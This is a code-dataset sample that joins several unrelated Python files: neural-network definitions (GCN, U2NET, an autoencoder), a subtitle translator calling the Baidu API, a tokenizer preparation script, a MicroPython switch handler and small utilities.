pad1 = (kernel_size[1] - 1) / 2
# kernel size had better be odd number so as to avoid alignment error
super(_GlobalConvModule, self).__init__()
self.conv_l1 = nn.Conv2d(in_dim, out_dim, kernel_size=(kernel_size[0], 1),
padding=(pad0, 0))
self.conv_l2 = nn.Conv2d(out_dim, out_dim, kernel_size=(1, kernel_size[1]),
padding=(0, pad1))
self.conv_r1 = nn.Conv2d(in_dim, out_dim, kernel_size=(1, kernel_size[1]),
padding=(0, pad1))
self.conv_r2 = nn.Conv2d(out_dim, out_dim, kernel_size=(kernel_size[0], 1),
padding=(pad0, 0))
def forward(self, x):
x_l = self.conv_l1(x)
x_l = self.conv_l2(x_l)
x_r = self.conv_r1(x)
x_r = self.conv_r2(x_r)
x = x_l + x_r
return x
class _BoundaryRefineModule(nn.Module):
def __init__(self, dim):
super(_BoundaryRefineModule, self).__init__()
self.relu = nn.ReLU(inplace=True)
self.conv1 = nn.Conv2d(dim, dim, kernel_size=3, padding=1)
self.conv2 = nn.Conv2d(dim, dim, kernel_size=3, padding=1)
def forward(self, x):
residual = self.conv1(x)
residual = self.relu(residual)
residual = self.conv2(residual)
out = x + residual
return out
class GCN(nn.Module):
def __init__(self, num_classes, input_size, pretrained=True):
super(GCN, self).__init__()
self.input_size = input_size
resnet = models.resnet152()
if pretrained:
resnet.load_state_dict(torch.load(res152_path))
self.layer0 = nn.Sequential(resnet.conv1, resnet.bn1, resnet.relu)
self.layer1 = nn.Sequential(resnet.maxpool, resnet.layer1)
self.layer2 = resnet.layer2
self.layer3 = resnet.layer3
self.layer4 = resnet.layer4
self.gcm1 = _GlobalConvModule(2048, num_classes, (7, 7))
self.gcm2 = _GlobalConvModule(1024, num_classes, (7, 7))
self.gcm3 = _GlobalConvModule(512, num_classes, (7, 7))
self.gcm4 = _GlobalConvModule(256, num_classes, (7, 7))
self.brm1 = _BoundaryRefineModule(num_classes)
self.brm2 = _BoundaryRefineModule(num_classes)
self.brm3 = _BoundaryRefineModule(num_classes)
self.brm4 = _BoundaryRefineModule(num_classes)
self.brm5 = _BoundaryRefineModule(num_classes)
self.brm6 = _BoundaryRefineModule(num_classes)
self.brm7 = _BoundaryRefineModule(num_classes)
self.brm8 = _BoundaryRefineModule(num_classes)
self.brm9 = _BoundaryRefineModule(num_classes)
initialize_weights(self.gcm1, self.gcm2, self.gcm3, self.gcm4, self.brm1, self.brm2, self.brm3,
self.brm4, self.brm5, self.brm6, self.brm7, self.brm8, self.brm9)
def forward(self, x):
# if x: 512
fm0 = self.layer0(x) # 256
fm1 = self.layer1(fm0) # 128
fm2 = self.layer2(fm1) # 64
fm3 = self.layer3(fm2) # 32
fm4 = self.layer4(fm3) # 16
gcfm1 = self.brm1(self.gcm1(fm4)) # 16
gcfm2 = self.brm2(self.gcm2(fm3)) # 32
gcfm3 = self.brm3(self.gcm3(fm2)) # 64
gcfm4 = self.brm4(self.gcm4(fm1)) # 128
fs1 = self.brm5(F.upsample_bilinear(gcfm1, fm3.size()[2:]) + gcfm2) # 32
fs2 = self.brm6(F.upsample_bilinear(fs1, fm2.size()[2:]) + gcfm3) # 64
fs3 = self.brm7(F.upsample_bilinear(fs2, fm1.size()[2:]) + gcfm4) # 128
fs4 = self.brm8(F.upsample_bilinear(fs3, fm0.size()[2:])) # 256
out = self.brm9(F.upsample_bilinear(fs4, self.input_size)) # 512
return out
| StarcoderdataPython |
362982 | from typing import List
class Solution:
def longestSubarray(self, nums: List[int], limit: int) -> int:
self.numToIdx = {}
for i in range(len(nums)):
if nums[i] not in self.numToIdx:
self.numToIdx[ nums[i] ] = []
self.numToIdx[ nums[i] ].append(i)
sortedNums = sorted(set(nums))
numList = [ ]
longestLen = 0
for i in range(len(sortedNums)):
if i == 0:
numList.append( sortedNums[0] )
else:
if sortedNums[i] - numList[0] <= limit:
numList.append( sortedNums[i] )
else:
currentLen = self.checkLength(numList)
if currentLen > longestLen:
longestLen = currentLen
numList.append( sortedNums[i] )
while True:
numList.pop(0)
if sortedNums[i] - numList[0] <= limit:
break
currentLen = self.checkLength(numList)
if currentLen > longestLen:
longestLen = currentLen
return longestLen
def checkLength(self, numList):
print("A", numList)
idxList = []
for num in numList:
idxList += self.numToIdx[ num ]
idxList.sort()
print("B", idxList)
longestLen = 0
for i in range(len(idxList)):
if i == 0:
lastVal = idxList[0]
curLen = 1
else:
if idxList[i] == lastVal + 1:
lastVal += 1
curLen += 1
else:
if curLen > longestLen:
longestLen = curLen
lastVal = idxList[i]
curLen = 1
if curLen > longestLen:
longestLen = curLen
return longestLen
| StarcoderdataPython |
11246090 | <reponame>amtam0/u2netscan
import os
from skimage import io, transform
import torch
import torchvision
from torch.autograd import Variable
import torch.nn as nn
import torch.nn.functional as F
from torch.utils.data import Dataset, DataLoader
from torchvision import transforms
# import torch.optim as optim
import numpy as np
from PIL import Image
import glob
# from data_loader import RescaleT
# from data_loader import ToTensor
# from data_loader import ToTensorLab
# from data_loader import SalObjDataset
from model import U2NET # full size version 173.6 MB
from model import U2NETP # small version u2net 4.7 MB
model_name = "u2netp"
if model_name=="u2netp":
model_dir = "saved_models/u2netp/u2netp.pth"
net = U2NETP(3,1)
else:
model_dir = "saved_models/u2net/u2net.pth"
net = U2NET(3,1)
if torch.cuda.is_available():
print("CUDA")
net.load_state_dict(torch.load(model_dir)) #ATA
net.cuda()
else:
net.load_state_dict(torch.load(model_dir,map_location='cpu')) #ATA
net.eval()
# normalize the predicted SOD probability map
def normPRED(d):
ma = torch.max(d)
mi = torch.min(d)
dn = (d-mi)/(ma-mi)
return dn
def save_output(image_name,pred,d_dir):
predict = pred
predict = predict.squeeze()
predict_np = predict.cpu().data.numpy()
im = Image.fromarray(predict_np*255).convert('RGB')
img_name = image_name.split(os.sep)[-1]
image = io.imread(image_name)
imo = im.resize((image.shape[1],image.shape[0]),resample=Image.BILINEAR)
pb_np = np.array(imo)
aaa = img_name.split(".")
bbb = aaa[0:-1]
imidx = bbb[0]
for i in range(1,len(bbb)):
imidx = imidx + "." + bbb[i]
imo.save(d_dir+imidx+'.png')
def ToTensorLab(image=None,imidx=None,label=None,flag=0):
tmpLbl = np.zeros(label.shape)
if(np.max(label)<1e-6):
label = label
else:
label = label/np.max(label)
# change the color space
if flag == 2: # with rgb and Lab colors
tmpImg = np.zeros((image.shape[0],image.shape[1],6))
tmpImgt = np.zeros((image.shape[0],image.shape[1],3))
if image.shape[2]==1:
tmpImgt[:,:,0] = image[:,:,0]
tmpImgt[:,:,1] = image[:,:,0]
tmpImgt[:,:,2] = image[:,:,0]
else:
tmpImgt = image
tmpImgtl = color.rgb2lab(tmpImgt)
# nomalize image to range [0,1]
tmpImg[:,:,0] = (tmpImgt[:,:,0]-np.min(tmpImgt[:,:,0]))/(np.max(tmpImgt[:,:,0])-np.min(tmpImgt[:,:,0]))
tmpImg[:,:,1] = (tmpImgt[:,:,1]-np.min(tmpImgt[:,:,1]))/(np.max(tmpImgt[:,:,1])-np.min(tmpImgt[:,:,1]))
tmpImg[:,:,2] = (tmpImgt[:,:,2]-np.min(tmpImgt[:,:,2]))/(np.max(tmpImgt[:,:,2])-np.min(tmpImgt[:,:,2]))
tmpImg[:,:,3] = (tmpImgtl[:,:,0]-np.min(tmpImgtl[:,:,0]))/(np.max(tmpImgtl[:,:,0])-np.min(tmpImgtl[:,:,0]))
tmpImg[:,:,4] = (tmpImgtl[:,:,1]-np.min(tmpImgtl[:,:,1]))/(np.max(tmpImgtl[:,:,1])-np.min(tmpImgtl[:,:,1]))
tmpImg[:,:,5] = (tmpImgtl[:,:,2]-np.min(tmpImgtl[:,:,2]))/(np.max(tmpImgtl[:,:,2])-np.min(tmpImgtl[:,:,2]))
# tmpImg = tmpImg/(np.max(tmpImg)-np.min(tmpImg))
tmpImg[:,:,0] = (tmpImg[:,:,0]-np.mean(tmpImg[:,:,0]))/np.std(tmpImg[:,:,0])
tmpImg[:,:,1] = (tmpImg[:,:,1]-np.mean(tmpImg[:,:,1]))/np.std(tmpImg[:,:,1])
tmpImg[:,:,2] = (tmpImg[:,:,2]-np.mean(tmpImg[:,:,2]))/np.std(tmpImg[:,:,2])
tmpImg[:,:,3] = (tmpImg[:,:,3]-np.mean(tmpImg[:,:,3]))/np.std(tmpImg[:,:,3])
tmpImg[:,:,4] = (tmpImg[:,:,4]-np.mean(tmpImg[:,:,4]))/np.std(tmpImg[:,:,4])
tmpImg[:,:,5] = (tmpImg[:,:,5]-np.mean(tmpImg[:,:,5]))/np.std(tmpImg[:,:,5])
elif flag == 1: #with Lab color
tmpImg = np.zeros((image.shape[0],image.shape[1],3))
if image.shape[2]==1:
tmpImg[:,:,0] = image[:,:,0]
tmpImg[:,:,1] = image[:,:,0]
tmpImg[:,:,2] = image[:,:,0]
else:
tmpImg = image
tmpImg = color.rgb2lab(tmpImg)
# tmpImg = tmpImg/(np.max(tmpImg)-np.min(tmpImg))
tmpImg[:,:,0] = (tmpImg[:,:,0]-np.min(tmpImg[:,:,0]))/(np.max(tmpImg[:,:,0])-np.min(tmpImg[:,:,0]))
tmpImg[:,:,1] = (tmpImg[:,:,1]-np.min(tmpImg[:,:,1]))/(np.max(tmpImg[:,:,1])-np.min(tmpImg[:,:,1]))
tmpImg[:,:,2] = (tmpImg[:,:,2]-np.min(tmpImg[:,:,2]))/(np.max(tmpImg[:,:,2])-np.min(tmpImg[:,:,2]))
tmpImg[:,:,0] = (tmpImg[:,:,0]-np.mean(tmpImg[:,:,0]))/np.std(tmpImg[:,:,0])
tmpImg[:,:,1] = (tmpImg[:,:,1]-np.mean(tmpImg[:,:,1]))/np.std(tmpImg[:,:,1])
tmpImg[:,:,2] = (tmpImg[:,:,2]-np.mean(tmpImg[:,:,2]))/np.std(tmpImg[:,:,2])
else: # with rgb color
tmpImg = np.zeros((image.shape[0],image.shape[1],3))
image = image/np.max(image)
if image.shape[2]==1:
tmpImg[:,:,0] = (image[:,:,0]-0.485)/0.229
tmpImg[:,:,1] = (image[:,:,0]-0.485)/0.229
tmpImg[:,:,2] = (image[:,:,0]-0.485)/0.229
else:
tmpImg[:,:,0] = (image[:,:,0]-0.485)/0.229
tmpImg[:,:,1] = (image[:,:,1]-0.456)/0.224
tmpImg[:,:,2] = (image[:,:,2]-0.406)/0.225
tmpLbl[:,:,0] = label[:,:,0]
# change the r,g,b to b,r,g from [0,255] to [0,1]
#transforms.Normalize(mean = (0.485, 0.456, 0.406), std = (0.229, 0.224, 0.225))
tmpImg = tmpImg.transpose((2, 0, 1))
tmpLbl = label.transpose((2, 0, 1))
return {'imidx':torch.from_numpy(imidx), 'image': torch.from_numpy(tmpImg), 'label': torch.from_numpy(tmpLbl)}
def RescaleT(image=None,imidx=None,label=None,output_size=320):
h, w = image.shape[:2]
if isinstance(output_size,int):
if h > w:
new_h, new_w = output_size*h/w,output_size
else:
new_h, new_w = output_size,output_size*w/h
else:
new_h, new_w = output_size
new_h, new_w = int(new_h), int(new_w)
# #resize the image to new_h x new_w and convert image from range [0,255] to [0,1]
# img = transform.resize(image,(new_h,new_w),mode='constant')
# lbl = transform.resize(label,(new_h,new_w),mode='constant', order=0, preserve_range=True)
img = transform.resize(image,(output_size,output_size),mode='constant')
lbl = transform.resize(label,(output_size,output_size),mode='constant', order=0, preserve_range=True)
return {'imidx':imidx, 'image':img,'label':lbl}
def SalObjDataset(img_name_list=None,lbl_name_list=None,idx=0):
image = io.imread(img_name_list[idx])
imname = img_name_list[idx]
imidx = np.array([idx])
if(0==len(lbl_name_list)):
print("0==len(lbl_name_list)")
label_3 = np.zeros(image.shape)
else:
label_3 = io.imread(lbl_name_list[idx])
label = np.zeros(label_3.shape[0:2])
if(3==len(label_3.shape)):
print("3==len(label_3.shape)")
label = label_3[:,:,0]
elif(2==len(label_3.shape)):
print("2==len(label_3.shape)")
label = label_3
if(3==len(image.shape) and 2==len(label.shape)):
label = label[:,:,np.newaxis]
print("3==len(image.shape) and 2==len(label.shape)")
elif(2==len(image.shape) and 2==len(label.shape)):
image = image[:,:,np.newaxis]
label = label[:,:,np.newaxis]
print("2==len(image.shape) and 2==len(label.shape)")
return {'imidx':imidx, 'image':image, 'label':label}
def main(model_name="u2netp",image_dir = "/tmp/in_data/",prediction_dir = "/tmp/out_data/"):
# --------- 1. get image path and name ---------
if model_name=="u2netp":
model_dir = "saved_models/u2netp/u2netp.pth"
else:
model_dir = "saved_models/u2net/u2net.pth"
img_name_list = glob.glob(image_dir + os.sep + '*')
print(img_name_list)
# --------- 2. dataloader ---------
#1. dataloader
# test_salobj_dataset = SalObjDataset(img_name_list = img_name_list,
# lbl_name_list = [],
# transform=transforms.Compose([RescaleT(320),
# ToTensorLab(flag=0)])
# )
# test_salobj_dataloader = DataLoader(test_salobj_dataset,
# batch_size=1,
# shuffle=False,
# num_workers=1)
###ATA####
sample = SalObjDataset(img_name_list=img_name_list,lbl_name_list=[],idx=0)
imidx,image,label = sample["imidx"],sample["image"],sample["label"]
sample = RescaleT(image=image,imidx=imidx,label=label,output_size=320)
imidx,image,label = sample["imidx"],sample["image"],sample["label"]
data_test = ToTensorLab(image=image,imidx=imidx,label=label,flag=0)
###ATA####
# --------- 3. model define ---------
"""if(model_name=='u2net'):
print("...load U2NET---173.6 MB")
net = U2NET(3,1)
elif(model_name=='u2netp'):
print("...load U2NEP---4.7 MB")
net = U2NETP(3,1)
if torch.cuda.is_available():
print("CUDA")
net.load_state_dict(torch.load(model_dir)) #ATA ,map_location='cpu'
net.cuda()
else:
net.load_state_dict(torch.load(model_dir,map_location='cpu')) #ATA
net.eval()
"""
print("MODEL LOADED OK")
# --------- 4. inference for each image ---------
# for i_test, data_test in enumerate(test_salobj_dataloader):
print("inferencing:",img_name_list[imidx[0]].split(os.sep)[-1])
inputs_test = data_test['image']
inputs_test = inputs_test.type(torch.FloatTensor)
if torch.cuda.is_available():
inputs_test = Variable(inputs_test.cuda())
else:
inputs_test = Variable(inputs_test)
d1,d2,d3,d4,d5,d6,d7= net(inputs_test.unsqueeze_(0)) #ATA add .unsqueeze_(0)
# normalization
pred = d1[:,0,:,:]
pred = normPRED(pred)
# save results to prediction_dir folder
if not os.path.exists(prediction_dir):
os.makedirs(prediction_dir, exist_ok=True)
save_output(img_name_list[imidx[0]],pred,prediction_dir)
del d1,d2,d3,d4,d5,d6,d7
# if __name__ == "__main__":
# main()
| StarcoderdataPython |
1857355 | <filename>scripts/json2testlinkCsv.py
#!/usr/bin/python
# Goal : to extract dictionnary in an xlsx file from a list of requirements
from pyReq import *
import argparse
class ReqGetXlsx(pyReq):
""" class for export of requirements in csv file for testlink tool
the goal is to be able to enter req into testlink
:arg pyReq: json input requirements file
:type pyReq: string
"""
def get_testlink_csv(self, listOfReq = [], testlinkFileName = 'getReq.csv'):
""" Get testlink csv file
:arg listOfReq: list of requirements to be exported
:type listOfReq: string
:arg testlinkFileName: output file : csv file for testlink
:type testlinkFileName: string
"""
#dictReq = self.get(listOfReq)
#print(listOfReq)
if listOfReq == []:
listOfReq = self.reqDict.keys()
print(listOfReq)
fp = open(testlinkFileName, 'w')
for tag in listOfReq:
# "RQT_SPR_FonctionX_0001","RQT_SPR_FonctionX_0001","La fonctionX doit etre mise en place au dessus de 30 degres.",1,"F",1,1
#print(tag)
#print(self.reqDict[tag][C_KEY_BODY])
fp.write('"%s","%s","%s",1,"F",1,1\n'%(tag,tag,self.reqDict[tag][C_KEY_BODY]))
fp.close()
print("Write csv file %s"%testlinkFileName)
def test():
getReqInstance = ReqGetXlsx(C_PATH_WORK+"docExample.json")
#listOfTags = ['RQT_0001','RQT_0003']
#print(getReqInstance.getKeys())
# Example 1 : get all requirements not covered of sprint 2 : what validation team has to do
listOfTagsSprint2 = getReqInstance.getListReqFromAttribute("attributeSprint", 2)
for tag in listOfTagsSprint2:
if getReqInstance[tag][C_KEY_COVERAGE] == []:
print("%s Not covered"%tag)
getReqInstance.get_testlink_csv(listOfTagsSprint2, C_PATH_OUT+'reqListSprint2NotCovered.csv')
# Example 2 : get all requirements covered by a KO test : what development team has to do
listOfTagsSprint1 = getReqInstance.getListReqFromAttribute("attributeStatus", "KO")
getReqInstance.get_testlink_csv(listOfTagsSprint1, C_PATH_OUT+'reqListStatusKO.csv')
if __name__ == '__main__':
#test()
parser = argparse.ArgumentParser(description='json2testlinkCsv %s\docExample.json %s\testlinkInput.csv'%(C_PATH_WORK, C_PATH_OUT))
parser.add_argument('jsonFileInput', action="store")
parser.add_argument('testlinkcsvFileOutput', action="store")
result = parser.parse_args()
arguments = dict(result._get_kwargs())
#print(arguments['xlsxFileInput'])
#print(arguments['jsonFileOutput'])
getReqInstance = ReqGetXlsx(arguments['jsonFileInput'])
#listOfTagsSprint1 = getReqInstance.getListReqFromAttribute("attributeStatus", "KO")
getReqInstance.get_testlink_csv([], arguments['testlinkcsvFileOutput'])
del(getReqInstance)
| StarcoderdataPython |
1655136 | ################################################################################
# filename: switch_skill.py
# date: 07. Apr. 2021
# username: winkste
# name: <NAME>
# description: This module handles the input signal of a switch.
# In the first implementation it will only support polling of an
# input pin. In future implementations also reacting on interrupts
# shall be possible, therefore a mode variable is defined and
# handed over to the object during construction
#
#
#
################################################################################
################################################################################
# Imports
import time
from src.skills.abs_skill import AbstractSkill
from src.mqtt.user_subs import UserSubs
from src.mqtt.user_pubs import UserPubs
import machine
import src.utils.trace as T
################################################################################
# Variables
_NO_VALUE = 0xff
_SWITCH_OFF_TIME = 1000
SWITCH_SKILL_MODE_POLL = 0
SWITCH_SKILL_MODE_ISR = 1
_SWITCH_STATE_LOW = 0
_SWITCH_STATE_HIGH = 1
_SWITCH_STATE_INIT = 0xff
_SWITCH_STATE_DICT_INV = {
_SWITCH_STATE_LOW: _SWITCH_STATE_HIGH,
_SWITCH_STATE_HIGH: _SWITCH_STATE_LOW,
}
################################################################################
# Functions
################################################################################
# Classes
################################################################################
# @brief This is the switch skill, handling a switch input signal
################################################################################
class SwitchSkill(AbstractSkill):
############################################################################
# Member Attributes
_pub_state = None
_publish_state = True
_current_state = _SWITCH_STATE_INIT
_switch_pin = _NO_VALUE
_led_pin = _NO_VALUE
_switch_gpio = None
_led_gpio = None
_led_inf = False
_swith_mode = SWITCH_SKILL_MODE_POLL
_switch_trigger = _SWITCH_STATE_HIGH
_switch_state_published = True
############################################################################
# Member Functions
############################################################################
# @brief constructor of the switch skill object
# @param dev_id device identification
# @param skill_entity skill entity if multiple skills are generated
# @param switch_pin switch input pin
# @param switch_mode switch detection mode, currently only poll supported
# @param led_pin led pin displaying the switch state
# @param led_inv led inverse state displaying
# @return none
############################################################################
def __init__(self, dev_id, skill_entity, switch_pin,
switch_mode=SWITCH_SKILL_MODE_POLL, led_pin=_NO_VALUE,
led_inv=False):
super().__init__(dev_id, skill_entity)
self._skill_name = "SWITCH skill"
self._pub_state = UserPubs("switch/triggered", dev_id, "std", skill_entity)
self._switch_pin = switch_pin
self._led_pin = led_pin
self._led_inf = led_inv
self._switch_mode = switch_mode
self._switch_gpio = None
self._led_gpio = None
self._switch_trigger = _SWITCH_STATE_LOW
############################################################################
# @brief starts the skill
# @return none
############################################################################
def start_skill(self):
global _NO_VALUE
if self._switch_pin != _NO_VALUE:
self._switch_gpio = machine.Pin(self._switch_pin, machine.Pin.IN)
if self._led_pin != _NO_VALUE:
self._led_gpio = machine.Pin(self._led_pin, machine.Pin.OUT)
T.trace(__name__, T.DEBUG, 'led pin configured: ' + str(self._led_pin))
############################################################################
# @brief checks the switch state transition
# @return none
############################################################################
def _check_switch_state_transition(self):
if self._switch_gpio != None:
new_switch_state = self._switch_gpio.value()
T.trace(__name__, T.DEBUG, 'SWITCH signal:' + str(new_switch_state))
if new_switch_state != self._current_state:
self._current_state = new_switch_state
T.trace(__name__, T.DEBUG, 'state transition detected...')
if new_switch_state == self._switch_trigger:
self._publish_state = True
if self._led_gpio != None:
if self._led_inf == False:
self._led_gpio.value(self._current_state)
T.trace(__name__, T.DEBUG, 'led state:' + str(self._current_state))
else:
self._led_gpio.value(_SWITCH_STATE_DICT_INV[self._current_state])
T.trace(__name__, T.DEBUG, 'led state:' + str(_SWITCH_STATE_DICT_INV[self._current_state]))
############################################################################
# @brief executes the skill cyclic task
# @return none
############################################################################
def execute_skill(self):
current_time = time.ticks_ms()
# check if we need to switch back 'ON' to 'OFF' state after time X
if self._switch_state_published:
if abs(time.ticks_diff(current_time, self._last_time)) > _SWITCH_OFF_TIME:
self._pub_state.publish('OFF')
self._switch_state_published = False
self._check_switch_state_transition()
if self._publish_state == True:
self._publish_state = False
self._pub_state.publish('ON')
self._last_time = current_time
self._switch_state_published = True
############################################################################
# @brief executes the incoming subscription callback handler
# @param topic topic identifier of the messsage
# @param payload payload of the message
# @return none
############################################################################
def execute_subscription(self, topic, data):
T.trace(__name__, T.ERROR, 'unexpected subscription')
T.trace(__name__, T.DEBUG, 'topic: ' + topic)
T.trace(__name__, T.DEBUG, 'data: ' + data)
############################################################################
# @brief stopps the skill
# @return none
############################################################################
def stop_skill(self):
super().stop_skill()
self._switch_gpio = None
self._current_state = _SWITCH_STATE_LOW
if self._led_gpio != None:
if self._led_inf == False:
self._led_gpio.value(self._current_state)
T.trace(__name__, T.DEBUG, 'led state:' + str(self._current_state))
else:
self._led_gpio.value(_SWITCH_STATE_DICT_INV[self._current_state])
T.trace(__name__, T.DEBUG, 'led state:' + str(_SWITCH_STATE_DICT_INV[self._current_state]))
self._led_gpio = None
################################################################################
# Scripts
T.configure(__name__, T.INFO)
if __name__ == "__main__":
# execute only if run as a script
T.trace(__name__, T.WARNING, 'no main script defined ')
| StarcoderdataPython |
3531879 | <reponame>aleph-oh/wikigame-solver
"""
This module contains constants for testing the database.
"""
from sqlalchemy import create_engine, event
from sqlalchemy.engine import Engine
from sqlalchemy.orm import sessionmaker
from ..utilities import set_sqlite_foreign_key_pragma
__all__ = ["TEST_DB_URL", "test_engine", "TestSession"]
TEST_DB_URL = "sqlite:///./test.db"
test_engine = create_engine(TEST_DB_URL)
TestSession = sessionmaker(autocommit=False, autoflush=False, bind=test_engine)
event.listens_for(Engine, "connect")(set_sqlite_foreign_key_pragma)
| StarcoderdataPython |
9703553 | # 翻译当前目录下所有srt文件,并在当前目录新建文件夹subtile_Translaed,保存所有翻译过的字幕文件,支持百度API和搜狗API
import http.client
import hashlib
import urllib
import random
import json
import time
import os
appid = '***************' # 填写你的appid
secretKey = '****************' # 填写你的密钥
# QPS = 1 #填写你的QPS
#打开当前目录下所有srt文件
srtFile = []
for i in range(len(os.listdir("."))):
if (os.listdir(".")[i][-3:] == "srt"):
srtFile.append(os.listdir(".")[i])
fileCount = len(srtFile)
for j in range(fileCount):
#读取字幕文件,并提取其中的英语句子,保存到subtitleContent列表中
with open(srtFile[j],encoding="utf-8") as file:
srt = file.read()
subtitle = srt.split("\n")
subtitleContent = []
for i in range(int(len(subtitle)/4)):
subtitleContent.append(subtitle[2+i*4])
##############################################
trsCount = len(subtitleContent)
#调用百度翻译API
trsResult = []
for i in range(trsCount):
httpClient = None
myurl = '/api/trans/vip/translate'
fromLang = 'en' #原文语种
toLang = 'zh' #译文语种
salt = random.randint(32768, 65536)
q= subtitleContent[i]
sign = appid + q + str(salt) + secretKey
sign = hashlib.md5(sign.encode()).hexdigest()
myurl = myurl + '?appid=' + appid + '&q=' + urllib.parse.quote(q) + '&from=' + fromLang + '&to=' + toLang + '&salt=' + str(
salt) + '&sign=' + sign
while True:
try:
httpClient = http.client.HTTPConnection('api.fanyi.<EMAIL>')
httpClient.request('GET', myurl)
# response是HTTPResponse对象
response = httpClient.getresponse()
result_all = response.read().decode("utf-8")
result = json.loads(result_all)
# print(q)
# print (result["trans_result"][0]["dst"].replace("搅拌机","Blender"))
if (len(result)==3):
trsResult.append(result["trans_result"][0]["dst"].replace("搅拌机","Blender"))
break
except Exception as e:
if (len(result)==3):
break
print (e)
finally:
if (len(result)==3):
break
if httpClient:
httpClient.close()
time.sleep(0.1)
tipStr = "正在翻译第" + str(j+1) + "/" + str(fileCount+1) + "个文件的第" + str(i+1) + "/" + str(trsCount + 1) + "句话"
os.system("cls")
print(tipStr)
###########################################################
#拼接翻译结果,并保存为新的SRT文件
finalResult = ""
for i in range(len(subtitle)):
if(subtitle[i] == ""):
finalResult += "\n\n"
else:
finalResult += subtitle[i] + "\n"
if (i - 2)%4 == 0:
finalResult += trsResult[int((i - 2)/4)]
# for i in range(len(subtitleContent)):
# print(subtitleContent[i])
# print(trsResult[i])
if not os.path.exists(".\subtile_Translaed"):
os.makedirs(".\subtile_Translaed")
with open(".\subtile_Translaed\\" + srtFile[j],"w",encoding="utf-8") as f:
f.write(finalResult)
file.close()
f.close()
##########################################
| StarcoderdataPython |
4902951 | dimensions = (200, 50)
print(dimensions[0])
print(dimensions[1])
for dimension in dimensions:
print(dimension)
print("Original dimensions:")
for dimension in dimensions:
print(dimension)
dimensions = (400, 1000)
print("\nModified dimensions:")
for dimension in dimensions:
print(dimension) | StarcoderdataPython |
12861467 | <reponame>wietsedv/gpt2-recycle<filename>src/preparation/2_prepare_0_tokens.py
from argparse import ArgumentParser
from pathlib import Path
import pickle
import os
from tqdm import tqdm
from tokenizers import Tokenizer
from tokenizers.processors import RobertaProcessing
from transformers import AutoTokenizer
def init_tokenizer(lang, n, m):
if n is None and m is None:
print('size nor model are specified, but one of them is required')
exit(1)
if m is not None:
tokenizer = AutoTokenizer.from_pretrained(m, use_fast=True)
return tokenizer
tokenizer = Tokenizer.from_file(
str(
Path('data') / lang / 'preparation' / 'vocabularies' /
f'{lang}-{str(n).zfill(3)}k.tokenizer.json'))
tokenizer.post_processor = RobertaProcessing(
('</s>', tokenizer.token_to_id('</s>')),
('<s>', tokenizer.token_to_id('<s>')),
trim_offsets=True)
return tokenizer
def tokenize_doc(tokenizer: Tokenizer, doc):
enc = tokenizer.encode(doc)
if type(enc) == list:
return enc
return enc.ids
def tokenize_file(tokenizer, src_path, eot=None):
examples = []
doc = ''
with open(src_path) as f:
for line in tqdm(f):
if eot is None and line == '\n':
examples.append(tokenize_doc(tokenizer, doc))
doc = ''
continue
elif eot is not None and line == eot + '\n':
examples.append(tokenize_doc(tokenizer, doc.strip()))
doc = ''
continue
doc += line
if doc != '':
examples.append(tokenize_doc(tokenizer, doc))
return examples
def main():
parser = ArgumentParser()
parser.add_argument('lang')
parser.add_argument('--size',
type=int,
default=None,
help='vocab size (in thousands)')
parser.add_argument('--model',
default=None,
help='HuggingFace model identifier')
parser.add_argument('--eot', default=None)
args = parser.parse_args()
prep_dir = Path('data') / args.lang / 'preparation' / 'prepared'
dst_path = prep_dir / ('data.pkl' if args.size is None else
f'data-{str(args.size).zfill(3)}k.pkl')
if not dst_path.parent.exists():
os.makedirs(dst_path.parent)
print(f' > preparing {dst_path}')
tokenizer = init_tokenizer(args.lang, args.size, args.model)
examples = []
src_paths = sorted((Path('data') / args.lang / 'preparation' /
'plaintext').glob('**/*.txt'))
for src_path in src_paths:
print('🔥', src_path)
new_examples = tokenize_file(tokenizer, src_path, eot=args.eot)
if src_path.name in ['train.txt', 'valid.txt', 'test.txt']:
subset = src_path.name.split('.')[0]
out_path = dst_path.parent / dst_path.name.replace(
'data', f'data-{subset}')
print(f' > exporting {len(new_examples):,} examples to {out_path}')
with open(out_path, 'wb') as f:
pickle.dump(new_examples, f)
examples.extend(new_examples)
print(f' ::: {len(examples):,} examples loaded')
print(f'{len(examples):,} examples')
print(f' > exporting {dst_path}')
with open(dst_path, 'wb') as f:
pickle.dump(examples, f)
if __name__ == '__main__':
main()
| StarcoderdataPython |
9710240 | <reponame>QuillMcGee/CharacterAutoencoder
import time
import numpy as np
import pylab
from keras.layers import Input, Dense, Conv2D, MaxPooling2D, Reshape, Flatten, UpSampling2D
from keras.models import Model
from matplotlib.widgets import Slider, Button
from helperfunctions import process, genvec
batch_size = 32
sidelen = 96
original_shape = (batch_size, 1, sidelen, sidelen)
latent_dim = 16
intermediate_dim = 256
x = Input(batch_shape=original_shape)
a = Conv2D(128, (5, 5), padding='same', activation='relu')(x)
b = MaxPooling2D(pool_size=(4, 4))(a)
c = Conv2D(128, (3,3), padding='same', activation='relu')(b)
d = Conv2D(16, (3,3), padding='same', activation='relu')(c)
d_reshaped = Flatten()(d)
h = Dense(intermediate_dim, activation='relu')(d_reshaped)
z_mean = Dense(latent_dim)(h)
# we instantiate these layers separately so as to reuse them later
decoder_h = Dense(intermediate_dim, activation='relu')
i = Dense(8 * 24 * 24, activation='relu')
j = Reshape((8, 24, 24))
k = Conv2D(128, (3,3), padding='same', activation='relu')
l = UpSampling2D((4, 4))
m = Conv2D(128, (3,3), padding='same', activation='relu')
n = Conv2D(128, (3,3), padding='same', activation='relu')
decoder_mean = Conv2D(1, (3,3), padding='same', activation='sigmoid')
h_decoded = decoder_h(z_mean)
i_decoded = i(h_decoded)
j_decoded = j(i_decoded)
k_decoded = k(j_decoded)
l_decoded = l(k_decoded)
m_decoded = m(l_decoded)
n_decoded = n(m_decoded)
x_decoded_mean = decoder_mean(n_decoded)
vae = Model(x, x_decoded_mean)
vae.compile(optimizer='rmsprop', loss="binary_crossentropy")
computer = "desktop"
if computer == "laptop":
x_train = np.load("/home/exa/Documents/PythonData/images_all_processed.npy")
elif computer == "desktop":
x_train = np.load("D:\\conlangstuff\\images_all_processed.npy")
x_train = x_train.reshape((x_train.shape[0], 1, sidelen, sidelen))
vae.load_weights("omniglot_16_1.sav")
# build a model to project inputs on the latent space
encoder = Model(x, z_mean)
print(encoder.output_shape)
# build a digit generator that can sample from the learned distribution
decoder_input = Input(shape=(latent_dim,))
_h_decoded = decoder_h(decoder_input)
_i_decoded = i(_h_decoded)
_j_decoded = j(_i_decoded)
_k_decoded = k(_j_decoded)
_l_decoded = l(_k_decoded)
_m_decoded = m(_l_decoded)
